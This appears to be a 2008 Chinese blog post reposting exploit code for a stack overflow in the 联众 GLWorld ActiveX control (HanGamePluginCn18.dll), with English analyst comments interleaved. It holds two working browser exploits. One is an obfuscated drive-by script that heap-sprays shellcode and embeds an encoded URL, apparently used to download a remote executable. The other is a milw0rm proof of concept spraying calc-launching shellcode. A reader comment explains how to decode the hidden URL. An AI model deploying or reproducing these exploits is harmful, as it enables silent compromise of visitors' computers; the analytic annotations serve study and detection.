
未公布的联众exploit 0Day


2008-05-04 08:23:13
标签:联众 0Day

以下消息来自幻影论坛[Ph4nt0m]邮件组
<!-- Analyst note: weaponized drive-by sample. The outer script does nothing except
     emit a second script through document.writeln; the %u- and \x-escaped string
     literals are the actual payload and are left byte-for-byte untouched here. -->
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
// The line above swallows every script error, so a failed attempt shows no dialog.
// Hidden object element created by CLSID. The comment thread on this page attributes
// this CLSID to GLWorld's HanGamePluginCn18.dll; the CLSID is the kill-bit / detection key.
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" style=\'display:none\' id=\'Kazakh\'><\/object>");
// Everything from here on is written into the page as a nested script element.
document.writeln("<SCRIPT language=\"javascript\">");
// Variable names (CPU code names, phone models, AV vendors) are decoys with no meaning.
document.writeln("var Wolfdalef,Wolfdalek,QuadroXFX;");
document.writeln("var Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsunga5,Samsunga6,Samsunga7;");
document.writeln("var Yorkfie1d,Yorkfie2d,Yorkfie3d,Yorkfie4d,Yorkfie5d,Yorkfie6d,Yorkfie7d;");
// Fourteen %u-escaped fragments of 11 UTF-16 units (22 bytes) each, emitted in a
// shuffled order; they are reassembled in numeric order further down into the two
// halves of the payload. The bytes themselves are not analysed here.
document.writeln("Samsunga1 = unescape(\"%u16eb%u335b%u66c9%ua4b8%u6639%u0431%u414b%u6640%uf981%u008c%uf37c\");");
document.writeln("Yorkfie2d = unescape(\"%u9ab2%u9717%u053a%u7a6f%ud24f%u063a%u3d0a%ub470%uf594%uc4fc%uf7e2\");");
document.writeln("Yorkfie1d = unescape(\"%ub268%ub568%u63b4%ue72e%ue739%u1769%ue56f%ubcc6%uba29%u676f%ud14c\");");
document.writeln("Yorkfie5d = unescape(\"%uf0c5%u22c5%u804e%u2b36%u6ed8%u6db9%uf303%udfa2%ub186%u6151%ud5b5\");");
document.writeln("Samsunga4 = unescape(\"%ub739%ucd51%ud54b%uee54%uadc6%u54ac%ubd60%ube39%u01b4%uc12e%uc139\");");
document.writeln("Yorkfie3d = unescape(\"%ue987%u2c03%uf34d%u37f8%ufe3e%ubee3%u0ed2%u1f02%ue64f%u8964%u2764\");");
document.writeln("Samsunga6 = unescape(\"%ucd5c%u316e%uc76f%u0b0a%u826a%u5f6e%ucb7f%u8769%u83c6%u5d2d%ubdc5\");");
document.writeln("Yorkfie4d = unescape(\"%ud939%u8e5c%u4d36%u59b1%u0b26%u82e7%u813e%uce39%u5291%uce63%u23d2\");");
document.writeln("Yorkfie6d = unescape(\"%u9a5a%ub4ec%u74a0%u694e%u244a%u3015%u504f%u405e%u474e%u4414%u0956\");");
document.writeln("Samsunga3 = unescape(\"%udcb2%u0025%uc6b2%u2431%udace%ue83c%udcd1%ub339%u5639%uddc0%ud856\");");
document.writeln("Yorkfie7d = unescape(\"%u4a4d%u4a48%u095e%u4d54%u064e%u4b58%u4554%u5e5f%u030b%u475d%u2f5c\");");
document.writeln("Samsunga2 = unescape(\"%u05eb%ue5e8%uffff%u4dff%ua5f7%ua639%ucd66%uf109%u225d%u2138%ua779\");");
document.writeln("Samsunga5 = unescape(\"%uaa6e%uc3c6%uc439%u93c6%uc53d%u00fe%ua939%uae55%u0d17%ucf79%ub45c\");");
document.writeln("Samsunga7 = unescape(\"%u812b%u3b92%ubcc4%u9ffe%ue01d%udc38%u22b2%u98b4%ub729%ub069%ub368\");");
// Reassembly of the two payload halves in their intended order.
document.writeln("Wolfdalef = Samsunga1+Samsunga2+Samsunga3+Samsunga4+Samsunga5+Samsunga6+Samsunga7;");
document.writeln("Wolfdalek = Yorkfie1d+Yorkfie2d+Yorkfie3d+Yorkfie4d+Yorkfie5d+Yorkfie6d+Yorkfie7d;");
// %u-escaped string whose leading units %u7468%u7074 the comment thread on this page
// decodes as "http": a URL, i.e. the network indicator for this sample. It is never
// referenced again by this script — presumably located and read by the payload at
// run time (TODO confirm).
document.writeln("var MmUrl = unescape(\"%u7468%u7074%u2f3a%u752f%u6573%u3172%u332e%u2d33%u3232%u6e2e%u7465%u622f%u6b61%u632e%u7373%u0080\");");
// Full payload that is appended to every sprayed block below.
document.writeln("QuadroXFX = Wolfdalef+Wolfdalek;");
// Hex-escaped pieces of a method name: "\x49\x45" is "IE"; "Start" and "Native" follow
// below. Joined, they give "IEStartNative" — the variable called hgs_startNotify does
// NOT hold the string "hgs_startNotify".
document.writeln("var hgs = \"\\x49\\x45\";");
// Norton: header slack added to the payload length when sizing the filler.
document.writeln("var Norton = 20;");
// Ewido: minimum length of the string handed to the vulnerable method.
document.writeln("var Ewido = 245;");
// Mcafee keeps the sprayed blocks alive.
document.writeln("Mcafee = new Array();");
document.writeln("var start = \"\\x53\\x74\\x61\\x72\\x74\";");
// 0x90 filler (x86 NOP) used to pad each spray block.
document.writeln("var AntiVir = unescape(\"%u9090\"+\"%u9090\");");
document.writeln("var Notify = \"\\x4e\\x61\\x74\\x69\\x76\\x65\";");
document.writeln("var hgs_startNotify = hgs+start+Notify;");
// Heap-spray construction: the filler is doubled until it exceeds header+payload, each
// block is padded to just under 0x40000 characters, and 300 copies of block+payload
// are stored in Mcafee (on the order of 150 MiB of heap). That allocation pattern is
// itself a behavioural detection signal.
document.writeln("var DrWeb = Norton+QuadroXFX.length;");
document.writeln("while (AntiVir.length<DrWeb) AntiVir+=AntiVir;");
document.writeln("fillblock = AntiVir.substring(0, DrWeb);");
document.writeln("block = AntiVir.substring(0, AntiVir.length-DrWeb);");
document.writeln("while(block.length+DrWeb<0x40000) block = block+block+fillblock;");
// ProgID spelled in hex escapes: "GLIEDown.IEDown.1". The object actually driven below
// is created from this ProgID, not from the CLSID of the hidden object element above;
// the thread on this page names HanGamePluginCn18, so this sample may exercise a
// different GLWorld control — confirm before keying detection on the CLSID alone.
document.writeln("VulObject=\"\\x47\\x4c\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x31\";");
document.writeln("for (x=0; x<300; x++) Mcafee[x] = block +QuadroXFX;");
// Reuses the id of the hidden object element; from here on Kazakh is the
// ProgID-created instance.
document.writeln("var Kazakh=new ActiveXObject(VulObject);");
// Trigger string: four "\x0c" characters doubled until at least Ewido (245) long
// (x is reused: loop counter above, trigger string here), then passed with two short
// literal arguments to the method whose name was assembled above.
document.writeln("var x =  unescape(\"%0c%0c%0c%0c\");");
document.writeln("while (x.length<Ewido) x += x;");
document.writeln("Kazakh[hgs_startNotify](x,\"AA\",\"AA\");");
document.writeln("<\/script>");
</SCRIPT>




    文章评论
 
2008-05-04 08:30:20
<%@ LANGUAGE = JavaScript %>
<%
// Analyst note: this is the milw0rm proof-of-concept for the GLWorld control (see the
// attribution line after the block). As pasted it sits inside ASP server-script tags
// with LANGUAGE=JavaScript, which would execute on an IIS server rather than in a
// visitor's browser — presumably a paste artefact of an HTML script block; TODO confirm
// against the original advisory. The escaped string literals are the payload and are
// left byte-for-byte untouched.

// Control instantiated by ProgID. The comment thread on this page maps it to
// HanGamePluginCn18.dll, CLSID 61F5C358-60FB-4A23-A312-D2B556620F20; ProgID and CLSID
// are the kill-bit / detection keys for this sample.
var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");

//run calc.exe
// %u-escaped machine code; its final units spell "calc", consistent with the author's
// comment above. Not disassembled here.
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

// Heap spray: 0x90 (x86 NOP) filler is doubled past headersize+shellcode, each block
// is padded to just under 0x40000 characters, and 300 copies of block+shellcode are
// kept alive in `memory` (on the order of 150 MiB of heap). The allocation pattern is
// a behavioural detection signal in its own right.
var bigblock = unescape("%u9090%u9090");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<300; x++) memory[x] = block + shellcode;

// Trigger: 1319 'A' characters, four "\x0a" characters, then the same 1319 'A's again
// (2642 characters total) — the string argument the comment thread identifies as
// overflowing a stack buffer in hgs_startNotify().
var buffer = '';

while (buffer.length < 1319) buffer+="A";

buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;

// The call that reaches the vulnerable string handling.
act.hgs_startNotify(buffer);

%>

# milw0rm.com [2008-02-19]

2008-05-04 08:30:56
引用网友评论:

不是什么0Day,二月份就有了。

联众世界游戏大厅主程序GLWorld所安装的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)在处理传给hgs_startGame()和hgs_startNotify()方法的字符串参数时存在栈溢出漏洞。

谈谈解密

在代码中搜索%u7468%u7074,这是exe网址中"http"这几个字符的编码:每个%uXXXX单元在内存中按小端序存放为两个字节,所以%u7468%u7074就是\x68\x74\x74\x70。因此即使没有现成的工具,直接在16进制编辑器里按顺序输入这些字节,也能完整地显示出来。

在代码中搜索%u652e%u6578,这是".exe"这个字符串的编码。(注:本文第一段代码中的网址以%u632e%u7373即".css"结尾,并不包含这一序列。)

这之间的部分即是exe地址。明白?

 
